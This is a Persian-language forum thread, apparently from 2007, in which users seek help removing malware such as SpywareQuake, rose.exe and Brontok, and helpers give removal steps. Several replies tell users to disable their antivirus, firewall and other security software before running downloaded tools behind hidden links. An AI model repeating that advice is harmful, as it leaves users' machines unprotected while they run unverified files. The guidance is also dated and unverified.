آقا یکی جواب بده!!!!!!!!

سلام....
سرعت سيستمم اومده پايين...
كاسپر راه به راه به هر برنامه ي اجرايي گير ميده(البته شايد از تنظيماتش باشه...من تنظيمات كاسپر رو بلد نيستم...)
اين پيغام مسخره كه هيچ جور نميشه از بينش برد...(هموني كه يكي ديگه از دوستان هم اشاره كرد)
واين پاپ آپ قرمز كاسپر كه نبايد الكي باشه....
نميدونم ...خلاصه ممنون ميشم اگه راهنمايم كنيد.

سلام دوست من

مشکل شما و آقا سعید ناشی از یک بدافزار به اسم SpywareQuake می باشد برای خلاصی از دست آن فایل زیر را

داونلود و نصب کنید و سپس با آن سیستمتان را اسکن کنید ( آنتی ویروس و فایروال و هر نرم افزار امنیتی دیگری را قبل از نصب غیر فعال

کنید ) حین اسکن به اینترنت وصل باشید تا برنامه فایلهای مورد نیازش را داونلود کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پس از نصب و اجرای برنامه یک صفحه به شکل زیر باز می شود:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما دکمه Enter را بزنید سپس صفحه زیر ظاهر می شود:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

روی کیبوردتتان عدد 1 را فشار داده و دوباره Enter را بزنید برنامه پس از آن به اینترنت وصل شده و فایلهای مورد نیاز را داونلود

می کند پس از اتمام داونلود دوباره Enter بزنید تا سیستم را اسکن کند در این حالت آیکونهای روی دسکتاپ ناپدید و دوباره ظاهر

می شوند صبر کنید تا اسکن تمام شده و صفحه زیر ظاهر شود:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دکمه OK را فشار دهید تا صفحه زیر ظاهر شود و سپس آن را هم ببندید :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر برنامه از شما خواست سیستم را ریستارت کنید. لازم به یادآوری نیست که حین اجرای این موارد بهتر است هیچ برنامه دیگری در حال اجرا نباشد.

کیست مرا یاری کند!!!!؟

vtn54 جان ممنون...
دارم دانلود ميكنم....
اميدوارم درست بشه....
خيلي ممنون از لطفت.

vtn54 جان ممنون از لطفت ....خلاص شدم....
فقط مونده يه چيز اونم كاسپر كه هنوز به همه چي گير ميده ....فكر كنم بايد تنظيماتشو درست كنم.....توو انجمن هر چي گشتم چيزه خاصي پيدا نكردم واسه آموزش تنظيمات كاسپر...
در كل واقعا دستت درد نكنه.

راستي ميشه در مورد بقيه ي گزينه هاي اين برنامه يه توضيحي بدي؟

دوست عزیز

خوشحالم که مشکلتان رفع شد در مورد کاسپرسکی باید عرض کنم علت این اخطارها به احتمال زیاد برنامه ای است که

روی سیستمت نصب کرده ای و به پروسه های دیگر دست اندازی می کند باید آن را پیدا کنی برای این کار روی Detailes...

بر روی اخطار داده شده کلیک کن و در صفحه باز شده بر روی Modules کلیک کن ببین پروسه مهاجم مال کدام برنامه

است اگر متعلق به برنامه مورد اطمینانی بود در صفحه اول گزینه ...Add to trusted zone را انتخاب کن.

سلام دوست عزیز

مشکل اولیه شما حل شده است ؟ اگر نشده بگو تا روش دیگری را امتحان کنیم.

فعلاً که مشکلی نیست:rolleye:

سلام..اين پيغاميه كه تو ديتيل واسه مديا پلير نوشته...

Process C:\WINDOWS\Explorer.EXE (PID: 1280) is attempting to invade process C:\Program Files\Windows
Media Player\wmplayer.exe (PID: 1856). This behaviour is typical of some malware.
بعدش هم اين مياد...هر لحظه :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اين هم جزيياتش :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اين پيغامها واسه ي همه ي برنامه هام مياد.

سلام..اين پيغاميه كه تو ديتيل واسه مديا پلير نوشته...

Process C:\WINDOWS\Explorer.EXE (PID: 1280) is attempting to invade process C:\Program Files\Windows
Media Player\wmplayer.exe (PID: 1856). This behaviour is typical of some malware.
بعدش هم اين مياد...هر لحظه :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اين هم جزيياتش :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اين پيغامها واسه ي همه ي برنامه هام مياد.

دوست عزیز دو کار می توانی بکنی : اگر حوصله سر و کله زدن با اخطارهای کاسپرسکی را نداری سرویس PDM

کاسپرسکی را غیر فعال کن البته واضح است که با اینکار سرویس ارزشمند و فوقالعاده موثری را از دست می دهی یا

اینکه هربار که اخطاری از این دست ظاهر می شود به دقت جزییات آن را بخوانی و بر اساس آن عمل کنی مثلا این

اخطاری که گذاشته ای نشان می دهد که ویندوز مدیا پلیر می خواهد از مودولی به نام Shell32.dll استفاده کند که نسبت

به قبل تغییر کرده است و این مودول متعلق به مایکروسافت بوده و در پوشه سیستم 32 قرار دارد و شما با خیال

راحت می توانید گزینه Add to shared DLL List را انتخاب کنی این پیامها مو قعی که کاسپرسکی را تازه نصب کرده اید

و کاسپرسکی هنوز با سیستم شما نا آشنا است و یا مواقعی که نسخه جدیدی از یک برنامه را نصب کرده اید ظاهر

می شود و پس از مدتی از تعداد آنها کاسته می شود ولی اگر این پیغامها برای تمام برنامه های شما ظاهر می شود

همانطور که در پست قبلی گفتم احتمالا ناشی از یک برناه دیگر است که به برنامه های دیگر دست اندازی می کند

معروفترین این برنامه ها Spyware Doctor و بابیلون هستند که یا باید از خیر آنها بگذری ( به ویژه Spyware Doctor )

و یا تمامی فایلهای اجرایی آنها را به Trusted Zone کاسپرسکی اضافه کنی.

با سلام بنده دو فایل که خیلی به آنها مشکوک بودم را اسکن کردم
1:winfile.exe البته یک این طور فایل هایی در وین های9xهست تو درایو سی وین 98 بود می ترسم دلیت کنم برم هوا!
2: SVCHOST.EXE-2D5FBD18.pf
خوب حالا من چه کنم؟
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یک سرچ کننین ببین فایلی به نام winhelpدارین ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ من دارم!

کرکی اجراء کردم که آلوده بود البته کاسپراسکای(601411 آبدیت شده )آنرا شناخت وپاک کرد ولی ویندوز خودبخود ریستارت شد بعد از آن بعضی اوقات ویندوز پیغام ریستارت میدهد وبعد از حدود یک دقیقه ریستارت میشود .
چاره چیست؟

سلام
دوست عزیز این رستارت ها نشانه ی این است که ویروس هنوز وجود دارد
چاره این است که از تمام قدرت کاسپرسکی استفاده کنین
البته کاسپرسکی این قوت رو به طور اوتوماتیک غیر فعال نصب میکند چون خیلی وقتها اشتباه عمل میکن
برای بهره گیری از تمام توان نه تمام توان بلکه با این کار باعث میشه تا تمام برنامه ها رو کنترل کنه و با این کار وقتی این پیغام ظاهر میشه میتونه بفهمه که این پیغام ناشی از چیه یا اینکه اصلا به طور کل بلاک کنه
نحوه ی فعال کردن Proactive defense
ابتدا کاسپرسکی رو باز کرده و به قسمت تنظیمات رفته
واز پنجره ای که باز می شود در بخشprotection
در قسمت Proactive defense
رفته و در انجا چکهای همه ی گزینه ها رو زده مخصوصا اون Application Integrity control را حتما چکمارک زنید
و بعد از این کارها سیستم رو فول اسکن کنید
یا باید منتظر بمانید موقعی که این پیغام ظاهر میشود برای همیشه ان را بلاک کنید تا دیگه اجرا نشود
کاسپرسکی به این صورت عمل می کنه که میاد و این برنامه یا همون ویروس رو اسکن می کنه
که این پیغام از اون ناشی میشه رو پیدا میکنه
نظر من اینه که شما بعد از بلاک کردن این هشدار یا پیدا کردن این ویروس و پاک کردن ان این تنظیمات رو غیر فعال کنید
چون به همه ی برنامه های در حال اجرا گیر میده و اونا رو اسکن میکنه
قربانتان
Adel.p30

سلام دوست من جنابvtn54

مشکل شما و آقا سعید ناشی از یک بدافزار به اسم SpywareQuake می باشد برای خلاصی از دست آن فایل زیر را

داونلود و نصب کنید و سپس با آن سیستمتان را اسکن کنید ( آنتی ویروس و فایروال و هر نرم افزار امنیتی دیگری را قبل از نصب غیر فعال

کنید ) حین اسکن به اینترنت وصل باشید تا برنامه فایلهای مورد نیازش را داونلود کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پس از نصب و اجرای برنامه یک صفحه به شکل زیر باز می شود:

باسلام
من هم چندروزپيش اين مشكل راداشتم ولي باتغييرتنظيمات كاسپراسكاي مشكلم حل شدولي براي اطمينان كه ريجيستري راهم پاك كنم راهي كه شما فرموديد انجام دادم فقط ميخواستم بپرسم كه بعدازتمام شدن كاردربرگه Note Pad كه درآخربازميشودوآدرس كليدهايي درريجيستري راميدهد آيا خودبرنامه اين كليدهاراپاك ميكنديابايدخودمان دستي اينكاررابكنيم.
متشكرم

سلام دوست من جنابvtn54

مشکل شما و آقا سعید ناشی از یک بدافزار به اسم SpywareQuake می باشد برای خلاصی از دست آن فایل زیر را

داونلود و نصب کنید و سپس با آن سیستمتان را اسکن کنید ( آنتی ویروس و فایروال و هر نرم افزار امنیتی دیگری را قبل از نصب غیر فعال

کنید ) حین اسکن به اینترنت وصل باشید تا برنامه فایلهای مورد نیازش را داونلود کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پس از نصب و اجرای برنامه یک صفحه به شکل زیر باز می شود:

باسلام
من هم چندروزپيش اين مشكل راداشتم ولي باتغييرتنظيمات كاسپراسكاي مشكلم حل شدولي براي اطمينان كه ريجيستري راهم پاك كنم راهي كه شما فرموديد انجام دادم فقط ميخواستم بپرسم كه بعدازتمام شدن كاردربرگه Note Pad كه درآخربازميشودوآدرس كليدهايي درريجيستري راميدهد آيا خودبرنامه اين كليدهاراپاك ميكنديابايدخودمان دستي اينكاررابكنيم.
متشكرم

سلام دوست من

کار خوبی کردی آن فایل را اجرا کردی چون کاسپرسکی آن بدافزار را پاک نمی کند فقط آن را بلوک می کند و اگر

روزی کاسپرسکی از کار افتاد بدافزار دوباره فعال می شود .در مورد کلیدهای رجیستری هم نگران نباش برنامه آنها را

پاک می کند تازه اگر چیزی هم در رجیستری باقی بماند چون فایل مادر از بین رفته است مشکلی ایجاد نخواهد کرد.

عادل خان کاری که گفته بودید انجام دادم ولی علی رغم کشف وازبین رفتن چند ویروس دیگر مشکل همچنان باقی است . ضمنا در هنگام ریستارت شدن ویندوز این پیغام را میدهد:
the system process c\windows\system32\services.exe terminated unexpectedly with status code 203 the system will now shotdown and restart وبعد از حدود 50 ثانیه ریستارت میشود.
لطفا کمک کنید

سلام
mapnaz
نگاه دوست من شما ابتدا سیستم ریاستور رو غیر فعال کن
System restore
بعد دوباره سیستم رو اسکن کن و هر چی پیدا کرد رو پاک کن
ضمنا اگه بتونی اسم ویروسها رو بزاری اینجا میتونم بهت خیلی کمک کنم
قربانت
Adel.p30

سلام دوست من جنابvtn54

مشکل شما و آقا سعید ناشی از یک بدافزار به اسم SpywareQuake می باشد برای خلاصی از دست آن فایل زیر را

داونلود و نصب کنید و سپس با آن سیستمتان را اسکن کنید ( آنتی ویروس و فایروال و هر نرم افزار امنیتی دیگری را قبل از نصب غیر فعال

کنید ) حین اسکن به اینترنت وصل باشید تا برنامه فایلهای مورد نیازش را داونلود کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


gholam جان دستت درد نکنه داداش .راحتمون کردی یه خدا این چند روزه بیچارمون کرده بود این هشداره
الان دیگه درست شده

موفق باشی
:happy::laughing:

khahesh mikonam ye ki komakam kone man ye viruse vahshatnak daram be esme rose.exe ke hich anti nemishnasatesh va be ram man ham sadame zad va inke to tak tak drive ham hast

با سلام
نحوه ی پاک کردن ویروس Rose.exe:
ابتدا سیستم ری استور رو غیر فعال کنید
برای این کار روی مای کامپیوتر راست کلیک کرده و پروپرتیس را انتخاب کرده و از پنجرهی ظاهر شده
سربرگ سیستم ری استور را انتخاب کنید
و گزینهی که به این معنا هست را چکمارک کنید غیرفعال کردن سیستم ری استور برای همه ی درایوها
و بعد با فشردن هم زمان کلیدهای CTRL+ALT+DELETE
پنجره ای به نام task managerضاهر خواهد شد و وقتی ان پنجره ظاهر شد به سربرگ Processesرفته
و در انجا به دنبال Processes rose.exe بگردید ووقتی ان رو پیدا کردین
با اشارگر موس اون رو انتخاب کنید و بعد روی دکمه ی end task کلیک کرده تا ان غیر فعال بشه
و بعد دوباره تسک منیجر رو باز و بسته کنید این برای اینه که مطما شوید پرسی ویروس از کار افتاده
توجه:اگر از این طریق پرسی پیدا نکردید از برنامه ی process viewerاستفاده کنید
ProcessExplorer:
لینک دانلود :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
بر نامه ی کامل و واقا قدرتمند در زمینه ی نشان دادن پرسسهای مخفی در حال اجرا
ودر مرحله ی بعد باید کلیدهای رو که ویروس در ریجستری ساخته رو دستی پاک کنید برای این منظور
وبعد از منوی استارت run را انتخاب کنید
ودر ان عبارت regedit را تایپ کنید
و بعد از اینکه پنجره ی مربوط به ویرایشگر ریجستری باز شد به مسیر زیر رفته:
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
در اینجا شما داری استارت اپ ویندوز رو از این ویروس پاک میکنید تا هر بار که ویندوز لود میشه ویروس هم همراش لود نشه
dll = "C:\system32\rose.exe"
ودر انجا کلید بالا یا یه چیزی شبیه اون یا کلا هر چیسزی که rose.exe داره رو پاک کنید
خوب و در مرحله ی اخر ریجستری رو بسته و بعد
از منوی استارت سرچ را انتخاب کنید
ودر کادر ان تایپ کنید
Autorun.infوسپس اگه فایلی رو پیدا کرد ان رو پاک کنید
و وقتی فایل بالا رو پاک کردین چهار تا فایل دیگه هم هست که باید اون ها رو پاک کنید
* NTDETECT.COM
* run.reg
* systemdate.ini
* systemfile.com
و هر یک از این فایلها رو بدو علامت ستار ه در کادر جستو جو گر ویندوز تایپ کنید وپس از پیدا شدن هر یک از انها هر یک را یکی
یکی پاک کنید
و به نظر من بعد که این کارها رو انجام دادید سیستم رو با یه انتی ویروس قدرتمند مثل کاسپرسکی که در همین بخش نرم افزارهای امنیتی تایپیک اختصاصیش هست و میتونید اخرین ورژن رو در اولین صحفه ی تایپیک دانلود کرده
یک نکته اون هم اینکه موقعی که می خواید سیستم رو با یه انتی ویروس چک کنید اون رو اپ دیت کنی تا لیست جدیدترین ویروس ها به انتی ویروستون اضافه بشه
قربانتان
Adel.p30

سلام.
من پسر عموم یک لپ تاب داره که یکبار که برده دانشگاه توی سایت دانشگاه ویروس بوده زده هارد اینو از این رو به اون رو کرده !
به اون صورت که ساختار هارد ریخته به هم .
با اونکه خیلی وقت نیست خریده شاید 4 5 ماه اما موقع چک کردن هارد میگه همش بد سکتور داره !
در حالی که اینطوری نیست .
میخوام بدونم که این چجور ویرووسی ؟
و اینکه چیکار کنه که از دستش خلاص شه بدون اینکه هاردش رو از دست بده ؟
ممنونم میشم کمک کنید

من یک مشکل بد دارم. چند روزی میشه که وقتی به اینترنت وصل میشم پس از چند ثانیه صدای شماره گیری از سیستم میاد . من نمیدونم این چه برنامه ای هستش که این کارو میکنه ولی من می ترسم برنامه مخرب باشه. جالب اینه که کاسپراسکای و نود 32 به این شماره گیری خودکار گیر نمیدن. کسی میتونه کمک کنه؟

بعد از اتصال صدا میاد یا وقتی داری وصل میشی اگه مورد دوم باشه که خوب طبیعیه مودم داره شماره میگیره تا به اینترنت وصل بشه ولی اگه بعدش باشه شاید ویروسی داری که تو به کشور دیگه ای کانکت میکنه که اون موقع خرجت میره بالا ..............

آقای منصوری من هم این مشکل رو داشتم که حلش کردم و طریقه ی آن هم به این صورت بود که من نورتون 2005 رو نصب کردم و اونو آپدیت کردم و زدم به جستجوی تمام درایوها که تو هر درایوی یک فایل به نام کپی دات اکسه و یکی به نام هاست دات اکسه پیدا کرد همچنین این تمپ یک و دو رو من اینا رو قرنتینه کرد البته الان پاکشون کردم ولی بازم درایوم یک پنجره ی جدید باز میکرد که امروز مشکلشو فهمیدم و اونم اینه که یک فایل به نام اوتوران دات اکسه وجود داره که من اونو از تمام درایوهام پاک کردم والان کامپیوترم سالمه سالمه

مورد دوم......... حالا چیکار کنم؟

سلام.
من نمیتونم Home Page را از طریق Internet Properties عوض کنم.
از IE7 استفاده می کنم.
اون پایین صفحه تنظیمات هم یه پیغام نوشته که میگه برخی از تنظیمات را فقط Admin میتونه عوض کنه.
مثلا ما خودمون Admin هستیم.
یه لحظه کسپر را غیرفعال کردم اینم عاقبتش شد.حالا هیچی پیدا نمیکنه.

من یک مشکل بد دارم. چند روزی میشه که وقتی به اینترنت وصل میشم پس از چند ثانیه صدای شماره گیری از سیستم میاد . من نمیدونم این چه برنامه ای هستش که این کارو میکنه ولی من می ترسم برنامه مخرب باشه. جالب اینه که کاسپراسکای و نود 32 به این شماره گیری خودکار گیر نمیدن. کسی میتونه کمک کنه؟
سلام دوست عزیز

از چه فایروالی استفاده می کنی؟ یک فایروال درست و حسابی باید جلوی تماس مخفی برنامه های نصب شده در

سیستمت را بگیرد.

مورد دوم......... حالا چیکار کنم؟
دوست عزیز اگه واقعا مورد دوم باشه که موردی نداره یعنی وقتی شما روی گزینه دیال کلیک میکنی که به اینترنت وصل میشی خوب مودم سعی میکنه که شماره اون شرکتی رو که توسط کارت اینترنتت به سیستم دادی رو بگیره که اون صدای شماره گیری میاد ولی به هر حال اگه میخوای اون صدا ها نیاد به قسمت Poperties دیالاپ کانکشنت برو و بعد به قسمت General و روی گزینه Configure کلیک کن و بعد اون پایین تیک گزینه Enable mo dem speaker رو بردار.....موفق باشی .........مرسی........:happy: ;) :laughing: :tongue:

سلام.
من spy sweeper را نصب کردم.اما بعد از نصبش وقتی خواستم install کنم این پیغام رو داد:
the source file is corrupdate
مشکل از کجاست .لطفا راهنماییم کنید.

سلام.
من نمیتونم Home Page را از طریق Internet Properties عوض کنم.
از IE7 استفاده می کنم.
اون پایین صفحه تنظیمات هم یه پیغام نوشته که میگه برخی از تنظیمات را فقط Admin میتونه عوض کنه.
مثلا ما خودمون Admin هستیم.
یه لحظه کسپر را غیرفعال کردم اینم عاقبتش شد.حالا هیچی پیدا نمیکنه.

احتمالا دليل اين امر ميتونه مربوط به آلوده شدن سيستم شما به يك Hijacker باشه كه اجازه تغيير Home Page را به شما نميده.پاك كردن اين جك و جونورها كمي دردسرسازه.توصيه ميكنم حتما 2-3 برنامه Anti Spyware خوب مثل Ewido يا spysweeper يا spyware doctor و امثالهم رو سيستم شما نصب باشه و آپديت هم فراموش نشه.مراقب رفتن به سايتهايي كه كرك يا سريال نرم افزارها را ميزارند هم باشيد.سايتهاي غير مجاز هم كه جاي خود داره.

من یک مشکل بد دارم. چند روزی میشه که وقتی به اینترنت وصل میشم پس از چند ثانیه صدای شماره گیری از سیستم میاد . من نمیدونم این چه برنامه ای هستش که این کارو میکنه ولی من می ترسم برنامه مخرب باشه. جالب اینه که کاسپراسکای و نود 32 به این شماره گیری خودکار گیر نمیدن. کسی میتونه کمک کنه؟

ببينيد يك برنامه هست به نام Dialer كه اين امكان رو داره كه بدون اطلاع شما شماره از پيش تعيين شده اي را كه عمدتا هم اروپايي هستند را شماره گيري كنه و شما نا خواسته با هزينه هنگفت تماس بين المللي مواجه ميشويد.اين برنامه عمدتا از طريق بازديد از سايتهاي مستهجن وارد سيستم ميشوند(البته منظور من شما نيستيد.اين برنامه اغلب از اين طريق وارد سيستم ميشود).شما بايد anti spyware هاي قوي روي سيستمتون نصب كنيد و مرتب هم سيستم خودتون رو اسكن كنيد.اين توضيح كلي بود براي شماره گيري بدون اطلاع يوزر.

دوستان سیستم من riskware invader گرفته چیکار کنم پاک بشه و همچنین
Spyware.Cyberlog-X
لطفا کمک کنید

دوستان سلام لطفا مرا در مورد پاک کردن ويروس win32/nuvens.ct راهنمايي کنيد زون آلارم نميتواند بصورت اتوماتيک از سيستم حذفش کند در ضمن عملکرد ويروس روي سيستم ريستور ويندوز است
متشکر

دوستان این اصلا به نظرمن ویروس نیست چون توی اداره ما هم تمام سیستمها همن طوری یک برنامه حفاظتی
سطح یک که از طریق داس کار میکنه و در سیستم هم دیده نمیشه .
می گید نه یک فایل prompet در startup شما هست که هر چه پاک کنید اتوماتیک بر میگرده .
امتحان کنید
کسی نمیدونه اسم این برنامه چیه.

اين ويروس Folder Option را حذف ميكنه و وارد ريجستري هم كه بشي يا هر دستوري تو Run اجرا كني كامپيوتر ريست مي شه. اگه كسي ميتونه ياري كنه. ممنون ميشم

سلام دوست عزیز

اسم ویروس Brontok است برای از بین بردن آن ابتدا فایل زیر را داونلود و اجرا کن و سیستمت را با آن اسکن کن تا کرم را

حذف کند اگر اجرا نشد در حالت Safe Mode آن را اجرا کن .اگر آنتی ویروس روی سیستمت نصب است هنگام اسکن آن

را خاموش کن ولی پس از تمام شدن اسکن و حذف کرم آن را آپدیت کن و سیستمت را با آنتی ویروس هم چک کن.

لینک:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یا

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام رايانه من به ويروس winlogon.exe وservices.exe و eksplorasi.exe آلوده شده و كاسپارسكي هم نميتونه پاكش منه و نميشه انتي ويروس جديدي هم نصب كرد چون هنگام نصب رستارت ميشه .كمكم كنيد.چطور نابودش كنم؟:blush:

من این ویروسو داشتم......اول به هر بد بختی بود با کاسپر آپدیت شده پاکش کردم که رو سیستم من حدود 300 تا فایل آلوده پیدا کرد......بعد از ریشه یه ویندوز نصب کردم مشکلم رفع شد

سلام،ديروز سيستم من يه ويروسي گرفته بود به اسم Trojan.Win32.Zapchast.cp ،با استفاده از كسپرسكي و ديسك نجات اينو كاملا پاك كردم،اما...اين ويروس حالت Safe mode منو از بين برده،جوري كه هر وقت مي خوام برم توي Safe mode با اين پيغام روبرو مي شم:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ESC to cancel load SPTD.sys
اگه كليد ESC‌ رو هم بزنم،هيچ اتفاقي نمي افته كمك كنيد،چه جوري اين Safe mode رو مثل اولش كنم

دوستان سیستم من riskware invader گرفته چیکار کنم پاک بشه و همچنین
Spyware.Cyberlog-X
لطفا کمک کنید

براي پاك كردن Spyware.cyber-x‌بهتره از يه ضدجاسوس مثل spyware terminator‌ يا spyware doctor‌ استفاده كني.
در ضمن Risk-ware Invader يك ويروس خاص نيست،بلكه آنتي ويروس كسپرسكي به هر فايلي كه مشكوك باشه،و ازش رفتار مشكوكي رو ببينه،به شما هشدار ميده و ميگه risk-ware invader پيدا كردم.

سلام رايانه من به ويروس winlogon.exe وservices.exe و eksplorasi.exe آلوده شده و كاسپارسكي هم نميتونه پاكش منه و نميشه انتي ويروس جديدي هم نصب كرد چون هنگام نصب رستارت ميشه .كمكم كنيد.چطور نابودش كنم؟:blush:

شما به یک آنتی ویروس نیاز دارید که احتیاج به نصب نداشته باشد و من بهترین آنتی ویروس را برای این منظور به شما

معرفی میکنم.

Dr.Web CureIt! همان آنتی ویروس دکتر وب است با این تفاوت که ...

1. این نسخه از آنتی ویروس کاملا مجانی است.

2. احتیاج به نصب نداره و فقط کافیه روی آیکون که همون فایل دانلود شده است کلیک کنید تا باز بشه.

3. قابلیت آپدیت و پاک کردن ویروسها و تروجانها را دارد.

4. قابلیت استفاده از هوش مصنوعی دکتر وب در این نسخه نیز وجود دارد.

5. دیگه خودتون امتحان کنید تا متوجه بقیه امکاتانش بشید.

لینک دانلود....


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

5.37 MB هم حجم داره.

فقط به این نکته توجه کنید که شما هر وقت که خواستید آخرین نسخه با آخرین آپدیت های دکتر وب را داشته باشید

باید دوباره همین Dr.Web CureIt را از لینک بالا دانلود کنید. اما با این تفاوت که این آپدیت های دکتر وب هر روز به این

لینک بالا اضافه میشن.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما به یک آنتی ویروس نیاز دارید که احتیاج به نصب نداشته باشد و من بهترین آنتی ویروس را برای این منظور به شما

معرفی میکنم.

Dr.Web CureIt! همان آنتی ویروس دکتر وب است با این تفاوت که ...

1. این نسخه از آنتی ویروس کاملا مجانی است.

2. احتیاج به نصب نداره و فقط کافیه روی آیکون که همون فایل دانلود شده است کلیک کنید تا باز بشه.

3. قابلیت آپدیت و پاک کردن ویروسها و تروجانها را دارد.

4. قابلیت استفاده از هوش مصنوعی دکتر وب در این نسخه نیز وجود دارد.

5. دیگه خودتون امتحان کنید تا متوجه بقیه امکاتانش بشید.

لینک دانلود....


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

5.37 MB هم حجم داره.

فقط به این نکته توجه کنید که شما هر وقت که خواستید آخرین نسخه با آخرین آپدیت های دکتر وب را داشته باشید

باید دوباره همین Dr.Web CureIt را از لینک بالا دانلود کنید. اما با این تفاوت که این آپدیت های دکتر وب هر روز به این

لینک بالا اضافه میشن.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ممنون دوست عزيز.

سلام . من چجوری خرابی های این کرم رو درست کنم؟
البته کامل ویروس کشی کردم ولی خرابی هاش هنوز باقی مونده . این عکس گویایه:

[[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مشکلم با ساختن یک یوزر جدید حل شد .

کامپیوتر من این error می دهدcopy.exe teemp2.exe هر چقدر که هم کامپیوتر efdisk کردم پاک نشده

با سلام خدمت اساتيد محترم اين بخش !

دوستان هم اکنون مشکل بسيار حادي گريبان گير بنده شده است که نمي دانم به چه طريقي بايستي آنرا حل کنم و آن اين است که سيستمم به يک کرم يا ويروس new folder . exe آلوده شده است و با چند آنتي ويروس معتبر سيستم را scan کردم آنها ويروس را پيدا کرده اند اما نتوانسنتد آنرا از روي سيستمم پاک کنند با اينکه بنده مجدداً ويندوزم را به خاطر ويروس هم عوض کردم بازهم اين ويروس يا کرم از روي سيستمم پاک نشده است و درحال پيشروي در سيتمم است (توليد مثل). با توجه به اينکه اطلاعات بسيار مهمي در هاردم موجود مي باشد که فعلاً قادر به Fdisk کردن سيستمم نمي باشم از تمامي اساتيد و کارشناسان محترم اين بخش کمک عاجزانه دارم که بنده را در اين زمينه در جهت از بين بردن کامل اين ويروس يا کرم از روي سيستمم راهنمايي کامل و جامع کند .
موفق و مويد باشيد .

نوشته شده در ساعت 16:17 دوشنبه 2007/2/5

با سلام خدمت اساتيد محترم اين بخش !

دوستان هم اکنون مشکل بسيار حادي گريبان گير بنده شده است که نمي دانم به چه طريقي بايستي آنرا حل کنم و آن اين است که سيستمم به يک کرم يا ويروس new folder . exe آلوده شده است و با چند آنتي ويروس معتبر سيستم را scan کردم آنها ويروس را پيدا کرده اند اما نتوانسنتد آنرا از روي سيستمم پاک کنند با اينکه بنده مجدداً ويندوزم را به خاطر ويروس هم عوض کردم بازهم اين ويروس يا کرم از روي سيستمم پاک نشده است و درحال پيشروي در سيتمم است (توليد مثل). با توجه به اينکه اطلاعات بسيار مهمي در هاردم موجود مي باشد که فعلاً قادر به Fdisk کردن سيستمم نمي باشم از تمامي اساتيد و کارشناسان محترم اين بخش کمک عاجزانه دارم که بنده را در اين زمينه در جهت از بين بردن کامل اين ويروس يا کرم از روي سيستمم راهنمايي کامل و جامع کند .
موفق و مويد باشيد .

نوشته شده در ساعت 16:17 دوشنبه 2007/2/5

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام به همگی من نمی دونم این موضوع به این تاپیک ربط داره یا نه! ولی خوب می خوام راه حل بوسیله برنامه برای این ویروس یا مشکل لعنتی پیدا کنیم .
من ویندوزمو تازه عوض کردم و هر وقت به اینترنت وصل میشم فایل لعنتی Kernel.exe میره تو استارتاپ من و دفعه ی بعد که سیستم رو روشن می کنم ، هارد شدیدا قژ و قژ می کنه و سیستم رو ریستارت می کنه و در ضمن این پیام هم تند تند میاد این عکسو ببینین :
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اگه احیانا از اعضاء عزیز پی سی وورلد کسی یه این مشکل بر خورده در جریان بذاره .

منم دقیقا این مشکل را داشتم ولی ویندوز را عوض کردم خیلی ویروس کسافتیه تو رو هک کردند برو توی ویندوز سیستم 32 اونجا این فایل هست بری تو مشخاصتش نوشته نوید هک!
من که نتونستم کاری کنم و ویندوز را عوض کردم خیلی دوست دارم ببینم چی جوری حل میشه

سلام رايانه من به ويروس winlogon.exe وservices.exe و eksplorasi.exe آلوده شده و كاسپارسكي هم نميتونه پاكش منه و نميشه انتي ويروس جديدي هم نصب كرد چون هنگام نصب رستارت ميشه .كمكم كنيد.چطور نابودش كنم؟:blush:
دوست عزيز اول كاسپراسكي خودت رو پاك كن بعد يه ويروس كش ديگه مثل بيت دفندر يا "اي وي جي" نصب و آپديت كن بعد بپاكش

منو به خاطر تأخیرم ببخشید، آخه امتحاناتم شروع شده بود !!
برای شروع بصورت زیر عمل کنید:
برنامه notepad را باز کرده و دستورات زیر را در آن بنویسید:
[AutoRun]

Open c:\
از منوي فايل گزينه Save AS را انتخاب كنبد و آن را به صورت زير در درایو C ذخيره كنيد :

File Name : AutoRun.inf
Save as type :All Files
Encoding: ANSI

از شما سؤالی پرسیده خواهد شد با این پیام که : “ فایل دیگری با این نام وجود دارد آیا میخواهید آنرا جایگزین کنید؟ ”
